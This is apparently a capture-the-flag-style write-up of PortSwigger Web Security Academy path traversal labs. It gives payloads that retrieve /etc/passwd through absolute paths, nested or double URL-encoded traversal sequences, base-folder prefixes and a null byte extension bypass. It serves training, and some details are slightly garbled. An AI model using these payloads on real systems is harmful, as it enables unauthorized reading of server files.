Labs Covered
This write-up focuses on the following PRACTITIONER-level labs from the PortSwigger Web Security Academy:
2 File path traversal, traversal sequences blocked with absolute path bypass
This lab demonstrates how attackers can bypass basic traversal sequence blocking by supplying absolute paths instead of relative traversal patterns.
3 File path traversal, traversal sequences stripped non-recursively
This lab shows how flawed sanitization that strips traversal sequences only once (non-recursively) can be bypassed by chaining multiple traversal sequences.
4 File path traversal, traversal sequences stripped with superfluous URL-decode
This lab demonstrates how attackers can leverage multiple layers of URL encoding to bypass sanitization logic that strips traversal sequences after decoding.
5 File path traversal, validation of start of path
This lab shows how poorly implemented checks that validate only the start of a file path can be bypassed to access unauthorized files.
6 File path traversal, validation of file extension with null byte bypass
This lab demonstrates how attackers can use null byte injection to bypass file extension validation and retrieve unauthorized files.
LAB 2 - File path traversal, traversal sequences blocked with absolute path bypass
Lab Description :
Overview
Solution :
To retrieve an image the application uses a GET request with the parameter filename:
To retrieve the contents of /etc/passwd, send the following request:
GET /image?filename=/etc/passwd
Lab is solved
LAB 3 - File path traversal, traversal sequences stripped non-recursively
Lab Description :
Solution :
When the webpage loads, it loads all the images. The captured request looks like this,
when we try this payload - …/./…/./…/./…/./…/./etc/passwd HTTP/2 , we get the contents of the file.
Lab is solved
LAB 4 - File path traversal, traversal sequences stripped with superfluous URL-decode
Lab Description :
Solution :
The request which loads images loooks like ,
To retrieve /etc/passwd we need to use double URL encode the characters:
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
Lab is solved
LAB 5 - File path traversal, validation of start of path
Lab Description :
Solution :
If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences to access restricted files.
For example:
filename=/var/www/images/../../../etc/passwd
In this lab, the website loads several images just like the previous labs. The request captured looks like this:
To retrieve /etc/passwd, we need the path to start with /var/www/images/ as required by the server.
Use the following request:
GET /image?filename=/var/www/images/../../../etc/passwd
Lab is solved
LAB 6 - File path traversal, validation of file extension with null byte bypass
Lab Description :
Solution :
If an application requires that the user-supplied filename must end with an expected file extension, such as .png, then it might be possible to use a null byte to effectively terminate the file path before the required extension.
For example:
filename=../../../etc/passwd%00.png
Note:
%00is a null byte used to terminate a string in certain programming languages. When used in URL input, it can trick the application into treating the input as a different file type, bypassing the extension check.
The captured request which loads images on the website looks like this:
Here, like all the previous labs, it loads a .jpg image.
If we give normal payload like ../../../etc/passwd , it will give us a 400 Bad Request in return .
This is because there is a security implementation being imposed here. The server only accepts i/p’s which end with a .jpg file extension.
So we craft a payload in such a way that the payload we send must satisfy the condition of the server & also retreive the /etc/passwd also.
So the final payload will be ../../../etc/passwd%00.png
Lab is solved